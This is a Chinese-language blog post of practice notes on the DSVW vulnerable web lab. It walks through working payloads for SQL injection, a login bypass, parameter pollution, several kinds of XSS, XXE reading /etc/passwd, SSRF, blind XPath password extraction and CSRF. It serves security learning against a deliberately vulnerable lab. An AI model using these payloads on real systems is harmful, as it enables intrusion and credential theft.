<!--
	作者：Sariay
	时间：2018-08-26
	描述：There may be a bug, but don't worry, Qiling(器灵) says that it can work normally! aha!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      Web靶场-DSVW | Archeri&#39;s Blog
    
  </title>
  <meta name="author" content="Archeri Shade">
  <meta name="keywords" content="" />
  <meta name="description" content="" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  
<link rel="stylesheet" href="/css/Annie.css">

  
  <!-- jquery -->
	
<script src="/plugin/jquery/jquery.min.js"></script>


<script>
    const CONFIG_BGIMAGE = {
      mode: 'random_you',
      normalSrc: '/img/header-bg.jpg',
      randomYouMax: 7,
      randomYouSrc: '/img/Random-img/',
	  randomOtherSrc: 'https://api.berryapi.net/?service=App.Bing.Images&day=-0',
	  preloaderEnable: true
    }
	
    const CONFIG_LEACLOUD_COUNT = {
      enable: false,
	  appId: 'AU8...',
	  appKey: '4cU...',
	  serverURLs: 'http' || ' '
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground bg-pan-br">
	<div class="mask">
		<!-- motto -->
		<div class="h-body">	
			
				<div class="motto text-shadow-pop-left">
					<p class="content" id="motto-content">获取中...</p>
					<p>-<p>
					<p class="author" id="motto-author">Just a minute...</p>
				</div>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more" class="scroll-down">
				<span class="icon-anchor1 animation-scroll-down"></span>
			</a>
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><span>0.0%</span></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			「Web靶场-DSVW」
		
	</p>

	
	

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<span class="logo"> 
			<img src="/img/logo.png">
		</span>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	
	<div class="nav-body">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>
	
	<div class="nav-footer">
		<ul id="global-social">
	
		<li>
			<a href="https://github.com/ArcheriShade" target="_blank">
				<span class="icon-github"></span>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
<script src="/plugin/toc/katelog.min.js"></script>


		
	 

<div class="layout-post">
	<div id="layout-post">
		<div class="article-title">
			
	<a href="/2022/10/25/Web%E9%9D%B6%E5%9C%BA-DSVW/" itemprop="url">
		Web靶场-DSVW
	</a>

		</div>

		<div class="article-meta">
			<span>
				<i class="icon-calendar1"></i>
				
				




	更新于

	<a href="/2022/10/25/Web%E9%9D%B6%E5%9C%BA-DSVW/" itemprop="url">
		<time datetime="2022-10-25T06:20:33.000Z" itemprop="dateUpdated">
	  		2022-10-25
	  </time>
	</a> 



			</span>
			<span>
				
	<i class="icon-price-tags"></i>
	
		<a href="/tags/Web/" class=" ">
			Web
		</a>
	
		<a href="/tags/Web%E9%9D%B6%E5%9C%BA/" class=" ">
			Web靶场
		</a>
	
		<a href="/tags/DVSW/" class=" ">
			DVSW
		</a>
	
		
			</span>
			
			



		</div>

		<div class="article-content" id="article-content">
			<h1 id="NOTE-DSVW靶场练习笔记"><a href="#NOTE-DSVW靶场练习笔记" class="headerlink" title="[NOTE] DSVW靶场练习笔记"></a>[NOTE] DSVW靶场练习笔记</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>是针对<a target="_blank" rel="noopener" href="https://github.com/stamparm/DSVW">DSVW靶场</a>的练习笔记<br>是在搞完Pikachu靶场之后<br>在整理vulnstack的<a target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/4/">Web安全入门进阶靶场</a>时发现的<br>里面版本比较老，就单独搞出来玩玩</p>
<p>最新版本v0.2b用Python 3运行<br>代码很顶，只有不到100行的代码<br>&#x3D;&#x3D;最后学习一下代码&#x3D;&#x3D;</p>
<p>环境：Kali Linux 2021.2 x64 | Python 3.9.2</p>
<p>由于也接触过几个Web靶场了，有些常见漏洞点就不太提及了</p>
<p>各漏洞点后面的<code>info</code>，都来自于OWASP Web安全测试指引（WSTG）<br>但是靶场中指向的URL版本都比较老<br><a target="_blank" rel="noopener" href="https://owasp.org/www-project-web-security-testing-guide/v42/">这里</a>是最新版的测试指引（后面可能也旧了嘻嘻）</p>
<h2 id="Blind-SQL-Injection-boolean"><a href="#Blind-SQL-Injection-boolean" class="headerlink" title="Blind SQL Injection (boolean)"></a>Blind SQL Injection (boolean)</h2><p><del>EZ</del>（呃，被打脸了，所以前进路上永不骄傲）</p>
<p>GET参数<code>id</code>为注入点，输入“’”的报错信息：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Traceback (most recent call last):</span><br><span class="line">  File <span class="string">&quot;/usr/share/DSVW/dsvw.py&quot;</span>, line <span class="number">30</span>, <span class="keyword">in</span> do_GET</span><br><span class="line">    cursor.execute(<span class="string">&quot;SELECT id, username, name, surname FROM users WHERE id=&quot;</span> + params[<span class="string">&quot;id&quot;</span>])</span><br><span class="line">sqlite3.OperationalError: near <span class="string">&quot;&#x27;&quot;</span>: syntax error</span><br></pre></td></tr></table></figure>

<p>简单验证payload：<code>/?id=99 union select 1,2,3,4</code>，判断回显4列</p>
<p>但是下面遇到难题了<br>因为是SQLite数据库，所有很多函数和常识都不太清楚<br>出门吃瘪，难受，学习去了</p>
<hr>
<p>简单学了下</p>
<p>爆库：<code>?id=99 union select type,name,tbl_name,sql from sqlite_master</code><br>sql字段返回<strong>表的结构</strong></p>
<p>爆users表：<code>?id=99 union select id,username,name,password from users</code></p>
<hr>
<p>最后试试sqlmap，随便打</p>
<hr>
<p>等一下，是盲注？这不全显了吗，服了&#x3D; &#x3D;</p>
<p>官方给的盲注payload：<br><code>/?id=2 and SUBSTR((SELECT password FROM users WHERE name=&#39;admin&#39;),1,1)=&#39;7&#39;</code></p>
<p>还是逻辑判断、substr那一套</p>
<h2 id="Blind-SQL-Injection-time"><a href="#Blind-SQL-Injection-time" class="headerlink" title="Blind SQL Injection (time)"></a>Blind SQL Injection (time)</h2><p>一样能直接全显，但是要试试时间盲注</p>
<p>官方payload：<br><code>?id=(SELECT (CASE WHEN (SUBSTR((SELECT password FROM users WHERE name=&#39;admin&#39;),2,1)=&#39;e&#39;) THEN (LIKE(&#39;ABCDEFG&#39;,UPPER(HEX(RANDOMBLOB(300000000))))) ELSE 0 END))</code></p>
<p>要点：</p>
<ul>
<li><p>使用了<code>case-when-then-else-end</code>语句做选择，起到类似于<code>if-else</code>的作用</p>
</li>
<li><p>休眠的语句：<code>LIKE(&#39;ABCDEFG&#39;,UPPER(HEX(RANDOMBLOB(300000000))))</code></p>
</li>
</ul>
<p>启发：<strong>休眠语句不一定要用显式的“sleep”啥的函数，用一些执行代价高的函数重复多次也行</strong></p>
<p>&#x3D;&#x3D;休眠语句还不太明白&#x3D;&#x3D;</p>
<h2 id="UNION-SQL-Injection"><a href="#UNION-SQL-Injection" class="headerlink" title="UNION SQL Injection"></a>UNION SQL Injection</h2><p><strong>union &amp; union all</strong></p>
<p>union内部的select语句必须拥有<strong>相同数量</strong>的列<br>列也必须拥有<strong>相似的数据类型</strong><br>同时，每条select语句中的<strong>列的顺序</strong>必须相同<br>（<strong>三要素</strong>）</p>
<p>union选取的是“集合”，值不重复<br>union all则会选取所有结果</p>
<hr>
<p>就是这个：<br><code>?id=99 union select id,username,name,password from users</code></p>
<p>官方payload：<br><code>/?id=2 UNION ALL SELECT NULL, NULL, NULL, (SELECT id||&#39;,&#39;||username||&#39;,&#39;||password FROM users WHERE username=&#39;admin&#39;)</code><br>涉及到一个多列拼接成一个字符串的方法：<code>||&#39;,&#39;||</code>（大概是这样吧）</p>
<h2 id="Login-Bypass"><a href="#Login-Bypass" class="headerlink" title="Login Bypass"></a>Login Bypass</h2><p>密码打入单引号：<code>/login?username=admin&amp;password=&#39;</code></p>
<p>报错信息：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Traceback (most recent call last):</span><br><span class="line">  File <span class="string">&quot;/usr/share/DSVW/dsvw.py&quot;</span>, line <span class="number">67</span>, <span class="keyword">in</span> do_GET</span><br><span class="line">    cursor.execute(<span class="string">&quot;SELECT * FROM users WHERE username=&#x27;&quot;</span> + re.sub(<span class="string">r&quot;[^\w]&quot;</span>, <span class="string">&quot;&quot;</span>, params.get(<span class="string">&quot;username&quot;</span>, <span class="string">&quot;&quot;</span>)) + <span class="string">&quot;&#x27; AND password=&#x27;&quot;</span> + params.get(<span class="string">&quot;password&quot;</span>, <span class="string">&quot;&quot;</span>) + <span class="string">&quot;&#x27;&quot;</span>)</span><br><span class="line">sqlite3.OperationalError: unrecognized token: <span class="string">&quot;&#x27;&#x27;&#x27;&quot;</span></span><br></pre></td></tr></table></figure>

<p>绕过payload：<code>/login?username=admin&amp;password=&#39; or &#39;1&#39;=&#39;1</code></p>
<h2 id="HTTP-Parameter-Pollution"><a href="#HTTP-Parameter-Pollution" class="headerlink" title="HTTP Parameter Pollution"></a>HTTP Parameter Pollution</h2><p>HTTP参数污染？没听过<br>先上网冲浪学习一波</p>
<p>又称HPP，大概是请求参数中有<strong>两个参数同名</strong>的话<br>不同Web服务器对其的处理规则不同<br>从而导致利用点出现</p>
<p>例如PHP&#x2F;Apache里边，会把最后一个同名参数作为传参<br><code>http://www.xx.com/?id=1&amp;id=&#39; or &#39;1&#39;=&#39;1</code><br>有可能检测到第一个<code>id</code>正常就通过，而传入服务器的是后面的恶意参数<br>（好像涉及到一个什么防火墙绕过？WebGoat里有说）</p>
<p>下面是具体不同Web服务器的处理方式：</p>
<table>
<thead>
<tr>
<th align="left">Web服务器</th>
<th align="left">参数获取函数</th>
<th>获取到的参数</th>
</tr>
</thead>
<tbody><tr>
<td align="left">PHP&#x2F;Apache</td>
<td align="left">$_GET(“par”)</td>
<td>Last</td>
</tr>
<tr>
<td align="left">JSP&#x2F;Tomcat</td>
<td align="left">Request.getParameter(“par”)</td>
<td>First</td>
</tr>
<tr>
<td align="left">Perl(CGI)&#x2F;Apache</td>
<td align="left">Param(“par”)</td>
<td>First</td>
</tr>
<tr>
<td align="left">Python&#x2F;Apache</td>
<td align="left">Getvalue(“par”)</td>
<td>All(List)</td>
</tr>
<tr>
<td align="left">ASP&#x2F;IIS</td>
<td align="left">Request.QueryString(“par”)</td>
<td>All(comma-delimited string)</td>
</tr>
</tbody></table>
<p>通常可以被其他漏洞结合使用，如XSS<br>也常用于<strong>WAF Bypass</strong>（WebGoat提及）</p>
<hr>
<p>靶场使用Python语言写的，所以对于多个重名参数，后端会做<strong>拼接</strong>处理<br>所以就有了官方payload：<br><code>/login?username=admin&amp;password=&#39;/*&amp;password=*/OR/*&amp;password=*/&#39;1&#39;/*&amp;password=*/LIKE/*&amp;password=*/&#39;1</code><br>多个<code>password</code>参数，拼接后变成：<br><code>&#39;/**/OR/**/&#39;1&#39;/**/LIKE/**/&#39;1</code><br>注释做间隔，逻辑判断为真，因此通过检验，绕过登录</p>
<h2 id="Cross-Site-Scripting-reflected"><a href="#Cross-Site-Scripting-reflected" class="headerlink" title="Cross Site Scripting (reflected)"></a>Cross Site Scripting (reflected)</h2><p>有个GET的参数<code>v</code>，传入内容会在页面最下面显示<br>传入<code>&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;</code>即弹窗</p>
<p>攻击者准备恶意服务器<br>准备获取cookie的接口、钓鱼页面、键盘记录脚本等<br>构造指向这些恶意攻击的payload，形成钓鱼链接诱惑受害者</p>
<h2 id="Cross-Site-Scripting-stored"><a href="#Cross-Site-Scripting-stored" class="headerlink" title="Cross Site Scripting (stored)"></a>Cross Site Scripting (stored)</h2><p>存储型，由于payload可以直接打入开放的页面<br>所以无需太多社工，直接打入payload<br>每个浏览到的人都会中招</p>
<h2 id="Cross-Site-Scripting-DOM"><a href="#Cross-Site-Scripting-DOM" class="headerlink" title="Cross Site Scripting (DOM)"></a>Cross Site Scripting (DOM)</h2><p>DOM型，大致上和JS脚本动态操纵HTML元素有关</p>
<p>页面源码找到相关的JS代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (index != -<span class="number">1</span>) <span class="variable language_">document</span>.<span class="title function_">write</span>(<span class="string">&#x27;&lt;div style=&quot;position: absolute; top: 5px; right: 5px;&quot;&gt;Chosen language: &lt;b&gt;&#x27;</span> + <span class="built_in">decodeURIComponent</span>(<span class="variable language_">document</span>.<span class="property">location</span>.<span class="property">hash</span>.<span class="title function_">substring</span>(index + <span class="number">5</span>)) + <span class="string">&#x27;&lt;/b&gt;&lt;/div&gt;&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>大概就是根据GET参数<code>lang</code>来在页面上动态地写入一个元素</p>
<p>根据上面的代码去主动闭合，有以下弹窗payload：<br><code>/?#lang=&lt;/b&gt;&lt;/div&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&lt;div&gt;&lt;b&gt;</code><br>（官方payload好像不用主动闭合也行）</p>
<h2 id="Cross-Site-Scripting-JSONP"><a href="#Cross-Site-Scripting-JSONP" class="headerlink" title="Cross Site Scripting (JSONP)"></a>Cross Site Scripting (JSONP)</h2><p>没听说过</p>
<p>JSON with Padding是json的一种“使用模式”<br>可以让网页从别的域名（网站）那获取资料，即<strong>跨域读取数据</strong></p>
<p><a target="_blank" rel="noopener" href="http://code-ken.github.io/2016/07/13/jsonp-json-ajax/">一个学习资料</a><br>大概就是由json格式封装的一段js代码</p>
<p>另外关于跨域的问题，很多标签里面的<code>src</code>属性是不受同源策略限制的</p>
<p>一个漏洞示范：<br><code>echo $_GET[&#39;callback&#39;] . &#39;(&#39; . $jsonData . &#39;);&#39;;</code><br>大概就是<code>callback</code>参数传递函数名，后面的<code>$jsonData</code>传递函数参数<br>再配合恰当的<code>Content-Type</code>头，echo出来，就有可能形成XSS等漏洞</p>
<hr>
<p>&#x2F;看看链接的URL：<code>/users.json?callback=process</code><br>看看users.json的内容，是一些用户信息</p>
<p>在原页面找到<code>process</code>函数的源码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">process</span>(<span class="params">data</span>) &#123;</span><br><span class="line">	<span class="title function_">alert</span>(<span class="string">&quot;Surname(s) from JSON results: &quot;</span> + <span class="title class_">Object</span>.<span class="title function_">keys</span>(data).<span class="title function_">map</span>(<span class="keyword">function</span>(<span class="params">k</span>) &#123;<span class="keyword">return</span> data[k]&#125;));</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>然后官方的payload：<br><code>http://10.10.10.1:65412/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess</code></p>
<p>奇怪的是直接地址栏输入不会引发弹窗，看看链接的onclick函数：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">onclick</span>(<span class="params">event</span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> script = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">  script.<span class="property">src</span> = <span class="string">&#x27;/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess&#x27;</span>;</span><br><span class="line">  <span class="variable language_">document</span>.<span class="title function_">getElementsByTagName</span>(<span class="string">&#x27;head&#x27;</span>)[<span class="number">0</span>].<span class="title function_">appendChild</span>(script);</span><br><span class="line">  <span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可能还和DOM的使用有关，emmmm</p>
<h2 id="XML-External-Entity-local"><a href="#XML-External-Entity-local" class="headerlink" title="XML External Entity (local)"></a>XML External Entity (local)</h2><p><code>xml</code>参数接收一段XML数据来解析，直接上payload（注意URL编码）：<br><code>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%3C!DOCTYPE%20author%20%5B%3C!ENTITY%20js%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cauthor%3E%26js%3B%3C%2Fauthor%3E</code></p>
<p><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&lt;!DOCTYPE author [&lt;!ENTITY js SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;author&gt;&amp;js;&lt;/author&gt;</code></p>
<p>实际上好像不用前面那段xml定义说明也OK？</p>
<p>另外shadow也能看到，权限真是高啊</p>
<h2 id="XML-External-Entity-remote"><a href="#XML-External-Entity-remote" class="headerlink" title="XML External Entity (remote)"></a>XML External Entity (remote)</h2><p>就是XXE能引用到远程的xml数据，不限于攻击者服务器上的恶意数据</p>
<h2 id="Server-Side-Request-Forgery"><a href="#Server-Side-Request-Forgery" class="headerlink" title="Server Side Request Forgery"></a>Server Side Request Forgery</h2><p><code>path</code>参数接受一个资源，然后由服务器去请求，再回显给用户</p>
<p><code>file:///etc/passwd</code>：请求服务器敏感数据<br><code>http://localhost:8878</code>：探测本机或内网端口，或者是访问内网站点</p>
<h2 id="Blind-XPath-Injection-boolean"><a href="#Blind-XPath-Injection-boolean" class="headerlink" title="Blind XPath Injection (boolean)"></a>Blind XPath Injection (boolean)</h2><p><del>XPath注入？没听说过</del></p>
<p>XPath的学习内容搬到了另外的笔记</p>
<hr>
<p>GET参数<code>name</code><br>传入<code>admin</code>，正常回显<br>传入<code>&#39; or &#39;1&#39;=&#39;1</code>，也回显了一个“vargas”，说明存在XPath注入<br>传入<code>&#39;</code>，报错，暴露查询语句：<br><code>xpath(&quot;.//user[name/text()=&#39;%s&#39;]&quot; % params[&quot;name&quot;])</code></p>
<p>根据查询语句构造payload试图暴库：<code>&#39;]|.//*|ss[&#39;</code><br>期待XPath查询语句变成这样：<code>.//user[name/text()=&#39;&#39;]|.//*|ss[&#39;&#39;]</code><br>但是执行还是报错：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Traceback (most recent call last):</span><br><span class="line">  File <span class="string">&quot;/usr/share/DSVW/dsvw.py&quot;</span>, line <span class="number">44</span>, <span class="keyword">in</span> do_GET</span><br><span class="line">    content += <span class="string">&quot;&lt;b&gt;Surname:&lt;/b&gt; %s%s&quot;</span> % (found[-<span class="number">1</span>].find(<span class="string">&quot;surname&quot;</span>).text <span class="keyword">if</span> found <span class="keyword">else</span> <span class="string">&quot;-&quot;</span>, HTML_POSTFIX)</span><br><span class="line">AttributeError: <span class="string">&#x27;NoneType&#x27;</span> <span class="built_in">object</span> has no attribute <span class="string">&#x27;text&#x27;</span></span><br></pre></td></tr></table></figure>

<p>估计是只回显某个用户的<code>surname</code>字段，所以全部爆出来会出现元素定位错误</p>
<p>那就按照题目意思去盲注<br>官方payload：<code>?name=admin&#39; and substring(password/text(),3,1)=&#39;n</code><br><code>.//user[name/text()=&#39;admin&#39; and substring(password/text(),3,1)=&#39;n&#39;]</code></p>
<hr>
<p>下面盲注猜解建议配合使用二分法</p>
<p>猜解当前节点的元素个数：<br><code>/?name=admin&#39; and count(.//*)=4 and &#39;1&#39;=&#39;1</code></p>
<p>猜解第一个元素名称的长度：<br><code>/?name=admin&#39; and string-length(name(.//*[position()=1]))=8 and &#39;1&#39;=&#39;1</code></p>
<p>猜解第一个元素名称的第一个字符:<br><code>/?name=admin&#39; and substring(name(.//*[position()=1]),1,1)=&#39;u&#39; and &#39;1&#39;=&#39;1</code></p>
<p>猜解第一个元素名称：<br><code>/?name=admin&#39; and name(.//*[position()=1])=&#39;username&#39; and &#39;1&#39;=&#39;1</code></p>
<p>猜解第四个元素名称：<br><code>/?name=admin&#39; and name(.//*[position()=4])=&#39;password&#39; and &#39;1&#39;=&#39;1</code></p>
<p>猜解第四个元素的值的长度：<br><code>/?name=admin&#39; and string-length(.//password/text())=10 and &#39;1&#39;=&#39;1</code></p>
<p>猜解第四个元素的值的第一个字符（字符之间可以直接用大小与号比较）：<br><code>/?name=admin&#39; and substring(.//password/text(), 1, 1)=&#39;7&#39; and &#39;1&#39;=&#39;1</code></p>
<p>猜解第四个元素的值：<br><code>/?name=admin&#39; and .//password/text()=&#39;7en8aiDoh!&#39; and &#39;1&#39;=&#39;1</code></p>
<hr>
<p>以上盲注都是进入到与’admin’有关的特定范围<br>是使用<code>.//</code>来选取当前节点<br>当然也可以使用<code>/</code>来从根元素选取节点</p>
<p>完整的XML文件如下：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">users</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">user</span> <span class="attr">id</span>=<span class="string">&quot;0&quot;</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">username</span>&gt;</span>admin<span class="tag">&lt;/<span class="name">username</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">name</span>&gt;</span>admin<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">surname</span>&gt;</span>admin<span class="tag">&lt;/<span class="name">surname</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">password</span>&gt;</span>7en8aiDoh!<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">user</span> <span class="attr">id</span>=<span class="string">&quot;1&quot;</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">username</span>&gt;</span>dricci<span class="tag">&lt;/<span class="name">username</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">name</span>&gt;</span>dian<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">surname</span>&gt;</span>ricci<span class="tag">&lt;/<span class="name">surname</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">password</span>&gt;</span>12345<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">user</span> <span class="attr">id</span>=<span class="string">&quot;2&quot;</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">username</span>&gt;</span>amason<span class="tag">&lt;/<span class="name">username</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">name</span>&gt;</span>anthony<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">surname</span>&gt;</span>mason<span class="tag">&lt;/<span class="name">surname</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">password</span>&gt;</span>gandalf<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">user</span> <span class="attr">id</span>=<span class="string">&quot;3&quot;</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">username</span>&gt;</span>svargas<span class="tag">&lt;/<span class="name">username</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">name</span>&gt;</span>sandra<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">surname</span>&gt;</span>vargas<span class="tag">&lt;/<span class="name">surname</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">password</span>&gt;</span>phest1945<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">users</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>再注一下加深印象</p>
<p>只有一个根节点：<br><code>/?name=admin&#39; and count(/*)=1 and &#39;1&#39;=&#39;1</code></p>
<p>根节点名称长度为5：<br><code>/?name=admin&#39; and string-length(name(/*[position()=1]))=5 and &#39;1&#39;=&#39;1</code></p>
<p>根节点名称第一个字符为‘u’：<br><code>/?name=admin&#39; and substring(name(/*[position()=1]),1,1)=&#39;u&#39; and &#39;1&#39;=&#39;1</code></p>
<p>根节点名称为“users”：<br><code>/?name=admin&#39; and name(/*[position()=1])=&#39;users&#39; and &#39;1&#39;=&#39;1</code></p>
<p>根节点下面有4个节点：<br><code>/?name=admin&#39; and count(/users/*)=4 and &#39;1&#39;=&#39;1</code></p>
<p>&#x2F;users下面第一个节点的名字是“user”：<br><code>/?name=admin&#39; and name(/users/*[position()=1])=&#39;user&#39; and &#39;1&#39;=&#39;1</code></p>
<p>第一个user节点下面有4个节点：<br><code>/?name=admin&#39; and count(/users/user[position()=1]/*)=4 and &#39;1&#39;=&#39;1</code></p>
<p>如果某一结点下面没有子节点，那么这样子将会直接返回节点值：<br><code>/users/user[position()=1]/*[position()=1]</code>匹配<code>admin</code></p>
<p>因此叶子节点应该这样提取节点名称：<br><code>name(/users/user[position()=1]/*[position()=1])</code></p>
<p>所以第一个user节点的第四个（叶子）节点长度为8：<br><code>/?name=admin&#39; and string-length(name(/users/user[position()=1]/*[position()=4]))=8 and &#39;1&#39;=&#39;1</code></p>
<p>第一个user节点的第四个（叶子）节点名称的第一个字符为‘p’：<br><code>/?name=admin&#39; and substring(name(/users/user[position()=1]/*[position()=4]),1,1)=&#39;p&#39; and &#39;1&#39;=&#39;1</code></p>
<p>第一个user节点的第四个（叶子）节点名称为“password”<br><code>/?name=admin&#39; and name(/users/user[position()=1]/*[position()=4])=&#39;password&#39; and &#39;1&#39;=&#39;1</code></p>
<p><code>/users/user[position()=1]/*[position()=4]</code>这个匹配到password的值</p>
<p>下略BLABLABLA</p>
<h2 id="Cross-Site-Request-Forgery"><a href="#Cross-Site-Request-Forgery" class="headerlink" title="Cross Site Request Forgery"></a>Cross Site Request Forgery</h2><p>老实说，感觉这个漏洞演示做得并不算太好<br>因为CSRF本质上是“借”权限执行非法操作<br>但是这个靶场本身的所有请求都没有鉴权措施</p>
<p>再看看官方payload：<br><code>/?v=&lt;img src=&quot;/?comment=&lt;div style=&quot;color:red; font-weight: bold&quot;&gt;I quit the job&lt;/div&gt;&quot;&gt;</code></p>
<p>一看，好像可以分成两部分<br>一部分是外层的<code>v</code>参数，这个参数在XSS里边出现过<br>另一部分是里层的<code>comment</code>参数，提交了CSRF漏洞本身页面的参数</p>
<p>我是这样理解的：<br>模拟的是用户已经有了提交<code>comment</code>参数的权限<br>但是这时候用户接收到了钓鱼链接，是一个XSS<br>点击之后，无意间“被”提交了<code>comment</code><br>从而模拟了“借权限”写入数据</p>
